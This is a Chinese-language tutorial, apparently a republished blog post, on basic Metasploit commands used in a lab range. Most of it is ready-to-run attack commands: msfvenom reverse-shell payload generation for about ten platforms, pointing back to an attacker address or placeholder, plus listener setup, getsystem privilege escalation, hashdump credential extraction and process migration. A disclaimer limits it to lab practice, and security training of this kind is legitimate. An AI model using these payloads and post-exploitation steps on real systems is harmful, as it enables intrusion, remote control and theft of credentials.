metasploit之基础命令操作
2022/1/29 20:07:46
本文主要是介绍metasploit之基础命令操作,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
metasploit基础命令操作
建立数据库:
msfdb init #对msf数据库进行初始化 service postgresql start #开启postgresql数据库 service postgresql status #查看状态
当我们需要使用msf进行一些扫描且需要记住扫描结果,需开启此数据库。
生成payload:
在msf上可以使用命令生成可执行文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe > msf.exe #反向reverse 正向bind
同样也是有php、asp、jsp、linux、war、python等等
#Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf #Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe #Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho #PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php #ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp #JSP: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp #WAR: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war #python: msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py #Bash: msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f raw > shell.sh #Perl: msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
这里比较常用的就是windows,如果不加x64,默认是x86
生成可执行程序:其中-p就是payload。-f就是执行程序的类型,-o就是将全面的代码生成指定的文件名,同样>也是可以相同的作用。
建立监听:
开启监听,获取权限,权限查看:
set payload windows/x64/meterpreter/reverse_tcp #添加payload攻击载荷,这里根据生成可执行文件中的payload set LHOST 10.10.10.128 #添加攻击机地址 show options #查看添加情况 set LPORT #添加攻击机端口 默认是4444,这根据你生成可执行文件中的端口来定 set RHOST #被攻击方地址 一般在正向连接中需要添加。 exploit && run #这两个命令都在可以执行上面的监听效果。
成功反弹:
但文件在被攻击方中运行后,会生成一个shell的session,此shell就是通过反向的方式让我们被攻击方来连接我们。
常用命令:
getuid #查看当前权限 getsystem #提权权限至system background #将session保存至后台 sessions #查看当前会话。
进程迁移:
hashdump #导出hash ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。 migrate PID号 #迁移进程
当我们进行进程迁移后,就可以看出已将administrator权限提升至system权限。当我们有的时候不能够执行hashdump时,则需要迁移进程后再使用。
退回初始权限:
当进行权限提升后,同样可以使用命令退回之前的权限:
rev2self #退回至当前权限
当我们连接了数据库时,在msf中便会记录我们一些重要数据,当我们进行信息收集时,便于我们查看:
这里可以看出使用db_xxx便可以调用一些命令。
查看历史数据:
services #查看信息收集或执行命令后,留存的有用数据。 services -d 10.10.10.158 #删除数据。 db_nmap #调用nmap来进行内部扫描。
断开session:
同样可以关掉这条session :
sessions -k id号 #关闭session
这篇关于metasploit之基础命令操作的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-22项目:远程温湿度检测系统
- 2024-12-21《鸿蒙HarmonyOS应用开发从入门到精通(第2版)》简介
- 2024-12-21后台管理系统开发教程:新手入门全指南
- 2024-12-21后台开发教程:新手入门及实战指南
- 2024-12-21后台综合解决方案教程:新手入门指南
- 2024-12-21接口模块封装教程:新手必备指南
- 2024-12-21请求动作封装教程:新手必看指南
- 2024-12-21RBAC的权限教程:从入门到实践
- 2024-12-21登录鉴权实战:新手入门教程
- 2024-12-21动态权限实战入门指南